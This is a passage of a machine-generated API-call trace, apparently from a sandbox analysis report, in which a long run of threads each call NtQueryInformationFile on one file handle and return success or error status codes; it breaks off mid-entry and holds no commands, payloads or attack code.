Thread: id = 1592 os_tid = 0x5cc [0154.239] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x488ff00, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x488ff00, FileInformation=0x44d8098) returned 0x0 Thread: id = 1593 os_tid = 0x840 [0154.242] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x477f818, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x477f818, FileInformation=0x44d8098) returned 0x0 Thread: id = 1594 os_tid = 0x69c [0154.244] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x487fc00, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x487fc00, FileInformation=0x44d8098) returned 0x0 Thread: id = 1595 os_tid = 0x6f0 [0154.245] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x480feb8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x480feb8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1596 os_tid = 0x810 [0154.247] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x483f880, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x483f880, FileInformation=0x44d8098) returned 0x0 Thread: id = 1597 os_tid = 0xa88 [0154.249] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x477f838, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x477f838, FileInformation=0x44d8098) returned 0x0 Thread: id = 1598 os_tid = 0x43c [0154.250] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x42efa60, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x42efa60, FileInformation=0x44d8098) returned 0x0 Thread: id = 1599 os_tid = 0x670 [0154.252] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x490fe78, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x490fe78, FileInformation=0x44d8098) returned 0x0 Thread: id = 1600 os_tid = 0xa14 [0154.254] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x434f9d8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x434f9d8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1601 os_tid = 0x990 [0154.256] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x432f9c8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x432f9c8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1602 os_tid = 0x2dc [0154.258] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48afc78, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48afc78, FileInformation=0x44d8098) returned 0xc0000003 Thread: id = 1603 os_tid = 0x74c [0154.261] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x479fca0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x479fca0, FileInformation=0x44d8098) returned 0xc0000010 Thread: id = 1604 os_tid = 0x3c4 [0154.263] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x430fe40, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x430fe40, FileInformation=0x44d8098) returned 0xc0000010 Thread: id = 1605 os_tid = 0x90 [0154.264] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x481f7d8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x481f7d8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1606 os_tid = 0x630 [0154.266] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x483f9e8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x483f9e8, FileInformation=0x44d8098) returned 0xc0000003 Thread: id = 1607 os_tid = 0x124 [0154.268] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x477fdc0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x477fdc0, FileInformation=0x44d8098) returned 0xc0000010 Thread: id = 1608 os_tid = 0xc0 [0154.270] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x479fb50, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x479fb50, FileInformation=0x44d8098) returned 0x0 Thread: id = 1609 os_tid = 0x360 [0154.272] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48bfa58, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48bfa58, FileInformation=0x44d8098) returned 0xc0000003 Thread: id = 1610 os_tid = 0x920 [0154.273] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x490f870, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x490f870, FileInformation=0x44d8098) returned 0x0 Thread: id = 1611 os_tid = 0xbec [0154.275] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48bfce8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48bfce8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1612 os_tid = 0x6b8 [0154.277] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x436f8f0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x436f8f0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1613 os_tid = 0x30c [0154.278] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x483f9d8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x483f9d8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1614 os_tid = 0xbfc [0154.280] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x494f7e8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x494f7e8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1615 os_tid = 0x3f8 [0154.283] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x477fc90, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x477fc90, FileInformation=0x44d8098) returned 0x0 Thread: id = 1616 os_tid = 0x6cc [0154.285] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x436f980, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x436f980, FileInformation=0x44d8098) returned 0x0 Thread: id = 1617 os_tid = 0x830 [0154.286] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x479f858, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x479f858, FileInformation=0x44d8098) returned 0x0 Thread: id = 1618 os_tid = 0x75c [0154.288] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x432fe98, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x432fe98, FileInformation=0x44d8098) returned 0x0 Thread: id = 1619 os_tid = 0x7f0 [0154.290] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x484ff28, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x484ff28, FileInformation=0x44d8098) returned 0x0 Thread: id = 1620 os_tid = 0x710 [0154.292] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x483fa50, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x483fa50, FileInformation=0x44d8098) returned 0x0 Thread: id = 1621 os_tid = 0x5d8 [0154.294] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x482f908, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x482f908, FileInformation=0x44d8098) returned 0xc0000003 Thread: id = 1622 os_tid = 0xbe4 [0154.296] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47bf8b8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47bf8b8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1623 os_tid = 0x600 [0154.297] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x487f7d0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x487f7d0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1624 os_tid = 0xbd0 [0154.300] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x483fe40, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x483fe40, FileInformation=0x44d8098) returned 0x0 Thread: id = 1625 os_tid = 0x158 [0154.301] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x433f968, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x433f968, FileInformation=0x44d8098) returned 0xc0000003 Thread: id = 1626 os_tid = 0xbd8 [0154.304] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47ef988, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47ef988, FileInformation=0x44d8098) returned 0x0 Thread: id = 1627 os_tid = 0xbe8 [0154.306] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x478fea0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x478fea0, FileInformation=0x44d8098) returned 0xc0000010 Thread: id = 1628 os_tid = 0xbdc [0154.307] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x479fe88, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x479fe88, FileInformation=0x44d8098) returned 0x0 Thread: id = 1629 os_tid = 0x5b4 [0154.309] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x42efa58, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x42efa58, FileInformation=0x44d8098) returned 0xc0000003 Thread: id = 1630 os_tid = 0x614 [0154.311] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x486fd78, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x486fd78, FileInformation=0x44d8098) returned 0x0 Thread: id = 1631 os_tid = 0x690 [0154.312] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x485fc48, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x485fc48, FileInformation=0x44d8098) returned 0xc0000003 Thread: id = 1632 os_tid = 0xa68 [0154.314] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x489fc68, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x489fc68, FileInformation=0x44d8098) returned 0x0 Thread: id = 1633 os_tid = 0x7d0 [0154.317] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x483fda8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x483fda8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1634 os_tid = 0x7d8 [0154.318] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x436f8e8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x436f8e8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1635 os_tid = 0x24c [0154.320] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x479f960, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x479f960, FileInformation=0x44d8098) returned 0xc0000003 Thread: id = 1636 os_tid = 0x9f8 [0154.335] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x487fab0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x487fab0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1637 os_tid = 0x798 [0154.338] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x42ef8a8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x42ef8a8, FileInformation=0x44d8098) returned 0xc000000d Thread: id = 1638 os_tid = 0xa3c [0154.340] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47afbd0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47afbd0, FileInformation=0x44d8098) returned 0xc000000d Thread: id = 1639 os_tid = 0x8c0 [0154.343] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x490f978, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x490f978, FileInformation=0x44d8098) returned 0xc000000d Thread: id = 1640 os_tid = 0x708 [0154.345] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48bfd70, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48bfd70, FileInformation=0x44d8098) returned 0xc000000d Thread: id = 1641 os_tid = 0xa64 [0154.346] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x482fc40, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x482fc40, FileInformation=0x44d8098) returned 0xc000000d Thread: id = 1642 os_tid = 0xa30 [0154.348] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x479fe38, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x479fe38, FileInformation=0x44d8098) returned 0xc000000d Thread: id = 1643 os_tid = 0x388 [0154.350] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47dfef0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47dfef0, FileInformation=0x44d8098) returned 0xc000000d Thread: id = 1644 os_tid = 0x760 [0154.351] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x477fa80, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x477fa80, FileInformation=0x44d8098) returned 0xc000000d Thread: id = 1645 os_tid = 0xa54 [0154.353] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x490fde0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x490fde0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1646 os_tid = 0x738 [0154.356] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x476ff50, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x476ff50, FileInformation=0x44d8098) returned 0xc0000003 Thread: id = 1647 os_tid = 0x488 [0154.359] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x481fd60, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x481fd60, FileInformation=0x44d8098) returned 0x0 Thread: id = 1648 os_tid = 0x6dc [0154.361] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48afb38, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48afb38, FileInformation=0x44d8098) returned 0x0 Thread: id = 1649 os_tid = 0x7a0 [0154.364] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x489f840, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x489f840, FileInformation=0x44d8098) returned 0x0 Thread: id = 1650 os_tid = 0x73c [0154.366] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x477ff58, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x477ff58, FileInformation=0x44d8098) returned 0x0 Thread: id = 1651 os_tid = 0x1c0 [0154.367] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x430f968, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x430f968, FileInformation=0x44d8098) returned 0xc0000003 Thread: id = 1652 os_tid = 0x7c4 [0154.369] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x487fbf0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x487fbf0, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 1653 os_tid = 0x790 [0154.370] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x436fef0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x436fef0, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 1654 os_tid = 0x688 [0154.372] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x479fcd0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x479fcd0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1655 os_tid = 0x240 [0154.374] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x489fb58, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x489fb58, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 1656 os_tid = 0x8e0 [0154.376] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x487fcc8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x487fcc8, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 1657 os_tid = 0x880 [0154.378] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x430ff20, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x430ff20, FileInformation=0x44d8098) returned 0x0 Thread: id = 1658 os_tid = 0x8f0 [0154.379] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x481fdf0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x481fdf0, FileInformation=0x44d8098) returned 0xc0000010 Thread: id = 1659 os_tid = 0xa18 [0154.381] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x478f830, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x478f830, FileInformation=0x44d8098) returned 0xc0000010 Thread: id = 1660 os_tid = 0x8a0 [0154.382] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47ffef8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47ffef8, FileInformation=0x44d8098) returned 0xc0000010 Thread: id = 1661 os_tid = 0x870 [0154.385] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47ffb30, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47ffb30, FileInformation=0x44d8098) returned 0xc0000010 Thread: id = 1662 os_tid = 0x9a0 [0154.386] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x488fa18, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x488fa18, FileInformation=0x44d8098) returned 0xc0000003 Thread: id = 1663 os_tid = 0x2c4 [0154.388] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x489fa10, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x489fa10, FileInformation=0x44d8098) returned 0x0 Thread: id = 1664 os_tid = 0x890 [0154.390] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x482f9a8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x482f9a8, FileInformation=0x44d8098) returned 0xc0000003 Thread: id = 1665 os_tid = 0x4e8 [0154.391] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x430ff10, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x430ff10, FileInformation=0x44d8098) returned 0x0 Thread: id = 1666 os_tid = 0xcc [0154.395] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x487fc98, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x487fc98, FileInformation=0x44d8098) returned 0x0 Thread: id = 1667 os_tid = 0xd0 [0154.397] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x489f800, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x489f800, FileInformation=0x44d8098) returned 0x0 Thread: id = 1668 os_tid = 0xd4 [0154.399] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48efbf0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48efbf0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1669 os_tid = 0xd8 [0154.400] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x485fda8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x485fda8, FileInformation=0x44d8098) returned 0xc0000003 Thread: id = 1670 os_tid = 0xdc [0154.402] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x432fd08, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x432fd08, FileInformation=0x44d8098) returned 0x0 Thread: id = 1671 os_tid = 0xe0 [0154.405] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x482fb10, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x482fb10, FileInformation=0x44d8098) returned 0x0 Thread: id = 1672 os_tid = 0xe4 [0154.406] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x479ff38, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x479ff38, FileInformation=0x44d8098) returned 0x0 Thread: id = 1673 os_tid = 0xe8 [0154.408] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x436f9c0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x436f9c0, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 1674 os_tid = 0xec [0154.409] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47bfeb8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47bfeb8, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 1675 os_tid = 0x748 [0154.412] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x482fa60, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x482fa60, FileInformation=0x44d8098) returned 0x0 Thread: id = 1676 os_tid = 0xc4 [0154.414] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47dfcc8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47dfcc8, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 1677 os_tid = 0x620 [0154.419] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x481fe08, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x481fe08, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 1678 os_tid = 0x910 [0154.421] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48efa48, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48efa48, FileInformation=0x44d8098) returned 0x0 Thread: id = 1679 os_tid = 0x950 [0154.424] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x42efcb8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x42efcb8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1680 os_tid = 0x940 [0154.426] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48efb90, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48efb90, FileInformation=0x44d8098) returned 0xc0000003 Thread: id = 1681 os_tid = 0x980 [0154.427] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x477fbc0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x477fbc0, FileInformation=0x44d8098) returned 0xc0000003 Thread: id = 1682 os_tid = 0xa10 [0154.429] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x477fdd8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x477fdd8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1683 os_tid = 0x72c [0154.432] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x482fe68, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x482fe68, FileInformation=0x44d8098) returned 0xc0000003 Thread: id = 1684 os_tid = 0x9e0 [0154.433] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x42efea8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x42efea8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1685 os_tid = 0x9c4 [0154.435] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47afa50, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47afa50, FileInformation=0x44d8098) returned 0x0 Thread: id = 1686 os_tid = 0xa6c [0154.436] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x477fb38, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x477fb38, FileInformation=0x44d8098) returned 0xc0000003 Thread: id = 1687 os_tid = 0xb00 [0154.438] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x482ff58, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x482ff58, FileInformation=0x44d8098) returned 0x0 Thread: id = 1688 os_tid = 0xaf8 [0154.439] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x482fcf8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x482fcf8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1689 os_tid = 0xae4 [0154.441] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47afb00, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47afb00, FileInformation=0x44d8098) returned 0x0 Thread: id = 1690 os_tid = 0x344 [0154.444] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47efab0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47efab0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1691 os_tid = 0x808 [0154.446] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x489f8b0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x489f8b0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1692 os_tid = 0x858 [0154.447] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47bfe30, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47bfe30, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 1693 os_tid = 0x224 [0154.450] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47bfab0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47bfab0, FileInformation=0x44d8098) returned 0xc0000003 Thread: id = 1694 os_tid = 0x4dc [0154.451] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x432f8d0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x432f8d0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1695 os_tid = 0x78c [0154.453] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x494fd40, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x494fd40, FileInformation=0x44d8098) returned 0x0 Thread: id = 1696 os_tid = 0xb0 [0154.455] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x478fb20, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x478fb20, FileInformation=0x44d8098) returned 0x0 Thread: id = 1697 os_tid = 0x314 [0154.457] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x42ef910, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x42ef910, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 1698 os_tid = 0x804 [0154.459] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x434f858, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x434f858, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 1699 os_tid = 0x854 [0154.461] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x436fcd0, FileInformation=0x44d8098, 